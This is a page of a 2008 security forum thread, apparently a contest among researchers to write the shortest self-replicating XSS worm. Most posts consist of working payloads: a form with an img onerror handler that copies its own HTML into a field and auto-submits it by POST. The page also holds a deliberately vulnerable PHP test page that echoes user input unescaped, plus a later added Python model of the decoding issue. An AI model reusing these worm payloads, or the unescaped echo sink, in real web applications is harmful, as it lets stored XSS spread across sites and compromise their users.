Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 02:53PM

ronald, as you say.. that grows, right?

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 01/09/2008 02:54PM by sirdarckcat.

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 09, 2008 02:54PM

nope, the semicolon is required to prevent growth

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 02:57PM

yeah it does? ah okay, new one for me. hehe... c'mon guys, we're right back where we started! a staggering bloated 140+

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 09, 2008 02:57PM

@ma1 - correct, if you define it, you are okay; if you try to find it by its location on a page in reference to something else that may or may not be there, that's not okay. Sorry if that was unclear to anyone.

The "spirit" of the rule (and most of the rules, actually) is that I want it to be pretty generic and work most of the time.

So that said, most of the plusses that are being used in the vectors are getting stripped by echo urldecode($_REQUEST[content]); which would make most of them invalid as written on the second iteration.

- RSnake
Gotta love it. http://ha.ckers.org

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 02:58PM

well, this is just me?
content=%3Cform%3E%3Cinput+name%3D%22content%22%3E%3Ciframe+onload%3D%22%28f%3DparentNode%29%5B0%5D.value%3D%27%3Cform%3E%27%2Bf.innerHTML%3Bf.submit%28alert%28%27XSS%27%2Cf.action%3D%28f.method%3D%27post%27%29%2B%27.php%27%29%29%22%3E%3B%3C%2Fiframe%3E

the semicolon is not helping..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 09, 2008 02:58PM

<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML,submit(alert('XSS'))">

149 bytes (shame on me...)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 01/09/2008 03:00PM by ma1.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 03:01PM

rsnake:

well, that's not fair xD

<form><input name='content'><img src='' onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML.replace(/\+/g,'%2B'),submit(alert('XSS'))">

<form><input name='content'><img src='' onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+encodeURIComponent(innerHTML),submit(alert('XSS'))">


still.. not fair..

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 03:01PM

ma1: sorry I won you on that one :P
http://sla.ckers.org/forum/read.php?2,18790,page=15#msg-19390

Edited 1 time(s). Last edit at 01/09/2008 03:02PM by sirdarckcat.

Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 09, 2008 03:02PM

rsnake Wrote:
-------------------------------------------------------
> So that said, most of the plusses that are being
> used in the vectors are getting stripped by echo
> urldecode($_REQUEST); which would make most of
> them invalid as written on the second iteration.

urldecode($_REQUEST) is nonsense; every element of the $_REQUEST, $_GET and $_POST arrays is already decoded.
My observation about the "+" applied only to XHR vectors which weren't escaping them, otherwise the form transparently urlencodes everything on submit.

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 09, 2008 03:03PM

@ma1 - yours doesn't grow, but it won't work (pluses are changed to spaces):

<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post') '.php',i[0].value='<form>' innerHTML,submit(alert('XSS'))">

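
The two points above (ma1: PHP has already decoded $_POST, so a second urldecode() is wrong; rsnake: the second decode turns the vectors' "+" into spaces) can be checked offline. The following Python model is an added illustration, not code from the thread: the function names and the sample request bodies are constructed, and the third sink shows the output encoding a real page would apply before echoing user input.

```python
"""Added example, not from the thread: models the PHP sinks discussed above.

PHP decodes an application/x-www-form-urlencoded body once when it builds
$_POST / $_REQUEST, so wrapping a field in urldecode() decodes it twice.
PHP's urldecode(), like Python's unquote_plus(), maps '+' to a space, which
is exactly what removed the '+' operators in rsnake's first test page.
Function names and sample inputs are constructed for this illustration.
"""
from html import escape
from urllib.parse import unquote_plus


def php_post_decode(body: str) -> dict:
    """One decoding pass, as PHP does for $_POST (constructed model)."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields


def echo_urldecode(body: str) -> str:
    """Sink 1: echo urldecode($_REQUEST['content']); decodes a second time."""
    return unquote_plus(php_post_decode(body)["content"])


def echo_post(body: str) -> str:
    """Sink 2: echo $_POST['content']; one decode, still no output encoding."""
    return php_post_decode(body)["content"]


def echo_escaped(body: str) -> str:
    """Defensive sink: htmlspecialchars()-style encoding before the echo."""
    return escape(php_post_decode(body)["content"], quote=True)


if __name__ == "__main__":
    # A browser submitting the field value  'a'+'b'  sends this body
    # (constructed sample; the form encodes '+' as %2B and quotes as %27).
    body = "content=%27a%27%2B%27b%27"
    print(repr(echo_urldecode(body)))  # "'a' 'b'"  -- the '+' became a space
    print(repr(echo_post(body)))       # "'a'+'b'"  -- intact, but reflected raw
    print(repr(echo_escaped(body)))    # "&#x27;a&#x27;+&#x27;b&#x27;"
```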
Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 09, 2008 03:04PM

<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'.concat(innerHTML),submit(alert('XSS'))">

Edited 1 time(s). Last edit at 01/09/2008 03:05PM by ma1.

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 09, 2008 03:05PM

@ma1 - test with this script to see what I mean:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
</head>
<body onload="var a=1;" onfocus="var a=1;">


<?php
// Contest sink: the submitted field is echoed back unescaped on purpose.
echo urldecode($_REQUEST['content']);
?>


</body>
</html>

Edited 1 time(s). Last edit at 01/09/2008 03:07PM by rsnake.

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 09, 2008 03:07PM

@ma1 - that one worked better, but it failed the second time it ran.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 03:07PM

rsnake, why are you urldecoding that? I don't understand xD

anyway..
shame on me?

<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post').concat('.php'),i[0].value='<form>'.concat(innerHTML),submit(alert('XSS'))">

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 09, 2008 03:09PM

Does mine grow on IE?

I haven't got it to test

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 09, 2008 03:11PM

You mean as opposed to:

echo $_POST["content"];

I guess I could do that instead. Never mind, ma1 - I was smoking crack, yours works fine. You can blame .mario for my insanity! ;)

Edited 1 time(s). Last edit at 01/09/2008 03:12PM by rsnake.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 03:11PM

I will get nightmares now, so you know. :)

Re: Diminutive XSS Worm Replication Contest
Posted by: ma1
Date: January 09, 2008 03:11PM

<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post').concat('.php'),i[0].value='<form>'.concat(innerHTML),submit(alert('XSS'))">

Re: Diminutive XSS Worm Replication Contest
Posted by: rsnake
Date: January 09, 2008 03:13PM

Hahah... sorry, sorry, I was totally mis-reading and caused some turmoil here. Here's what you should be using:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
</head>
<body onload="var a=1;" onfocus="var a=1;">


<?php
// Contest sink: the submitted field is echoed back unescaped on purpose.
echo $_POST['content'];
?>


</body>
</html>

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 03:15PM

This rox btw:

onerror="_=parentNode.cloneNode(true);alert(_)"

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 03:17PM

we don't want urldecode!!

[[url=http://www.netdisaster.com/go.php?mode=tomato&destruction=massive&lang=es&url=http%3A//sla.ckers.org/forum/read.php%3F2%2C18790]http://sla.ckers.org/defaced[/url]]

hehe just a joke.. it doesn't work on firefox+noscript in some cases so.. try it on IE

Greetz!!

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 03:19PM

hey, so mine is the smallest?
http://sla.ckers.org/forum/read.php?2,18790,page=15#msg-19390
i rock!! hehe

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 03:20PM

Yeah you have the SMALLEST, wear it with pride I'd say! ;-)

when is this over btw? I'm desperately trying to get my life back.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 03:22PM

ahh come on ronald.. you know that everyone helped to get this smaller..
at the end I guess rsnake will have to say that we all won..

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 03:23PM

ah btw.. the quotes are wrong..

<form><input name="content"><img src="" onerror="with(i=parentNode)action=(method='post')+'.php',i[0].value='<form>'+innerHTML,submit(alert('XSS'))">

hehe

Edited 1 time(s). Last edit at 01/09/2008 03:24PM by sirdarckcat.

Re: Diminutive XSS Worm Replication Contest
Posted by: Anonymous User
Date: January 09, 2008 03:25PM

hehe, I know, just messing around. I'm a bit ashamed of the flawed vectors I posted; you see, it spawned about 100+ messages with error-prone children, but that's what you get with mutating atrocities!

I had my fun, I don't know which one is best. I like ma1's iframe-sliced xhr since it's more unobtrusive, and harder to detect what's happening.

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 09, 2008 03:25PM

@ronald

This ROX :D

<form action="post.php"><img src="" onerror="with(parentNode)appendChild(cloneNode(1));alert(parentNode.innerHTML.slice(103))"></form>

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 03:27PM

are you sure that doesn't grow?
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html>
<head>
</head>
<body onload="var a=1;" onfocus="var a=1;">

HELLO WORLD
<form action="post.php"><img src="" onerror="with(parentNode)appendChild(cloneNode(1));alert(parentNode.innerHTML.slice(103))"></form>
HELLO WORLD

</body>
</html>

and where's the submit and the payload :S

I don't understand, dude..

Edited 1 time(s). Last edit at 01/09/2008 03:28PM by sirdarckcat.

Re: Diminutive XSS Worm Replication Contest
Posted by: Gareth Heyes
Date: January 09, 2008 03:30PM

@sdc

It wasn't an entry, I was demoing cloning a parent node with itself and its contents.

Re: Diminutive XSS Worm Replication Contest
Posted by: sirdarckcat
Date: January 09, 2008 03:30PM

ahh ok Sorry
